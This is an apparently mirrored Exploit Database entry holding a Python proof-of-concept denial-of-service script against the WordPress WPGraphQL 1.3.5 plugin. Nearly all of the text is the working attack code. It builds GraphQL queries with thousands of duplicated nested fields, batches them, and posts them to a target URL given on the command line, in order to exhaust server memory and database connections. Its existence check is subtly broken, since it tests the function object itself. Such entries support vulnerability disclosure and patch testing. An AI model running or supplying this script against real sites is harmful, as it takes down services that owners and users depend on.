WordPress Plugin WPGraphQL 1.3.5 – Denial of Service

• Exploit Database
• 12 阅读

• 作者： Dolev Farhi
  日期： 2021-04-27
• 类别：

  • dos
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49807/

• # Exploit Title: WordPress Plugin WPGraphQL 1.3.5 - Denial of Service 
  # Author: Dolev Farhi
  # Date: 2021-04-12
  # Vendor Homepage: https://www.wpgraphql.com/
  # Version: 1.3.5 
  # Tested on: Ubuntu
  
  
  """
  This attack uses duplication of fields amplified by GraphQL batched queries, resulting in server OOM and MySQL connection errors.
  """
  
  import sys
  import requests
  
  
  def usage():
  print('* WordPress GraphQL 1.3.5 Denial of Service *')
  print('python {} <wordpress_url> <number_of_field_duplications> <number_of_chained_queries>'.format(sys.argv[0]))
  print('python {} http://site.com 10000 100'.format(sys.argv[0]))
  sys.exit(1)
  
  if len(sys.argv) < 4:
  print('Missing arguments!')
  usage()
  
  def wpgql_exists():
  try:
  r = requests.post(WORDPRESS_URL, json='x')
  if 'GraphQL' in r.json()['errors'][0]['message']:
  return True
  except:
  pass
  return False
  
  # This PoC assumes graphql is located at index.php?graphql
  WORDPRESS_URL = sys.argv[1] + '/index.php?graphql'
  FORCE_MULTIPLIER = int(sys.argv[2])
  CHAINED_REQUESTS = int(sys.argv[3])
  
  if wpgql_exists is False:
  print('Could not identify GraphQL running at "/index.php?graphql"')
  sys.exit(1)
  
  queries = []
  
  payload = 'content \n comments { \n nodes { \n content } }' * FORCE_MULTIPLIER
  query = {'query':'query { \n posts { \n nodes { \n ' + payload + '} } }'}
  
  for _ in range(0, CHAINED_REQUESTS):
  queries.append(query)
  
  r = requests.post(WORDPRESS_URL, json=queries)
  print('Time took: {} seconds '.format(r.elapsed.total_seconds()))
  print('Response:', r.json())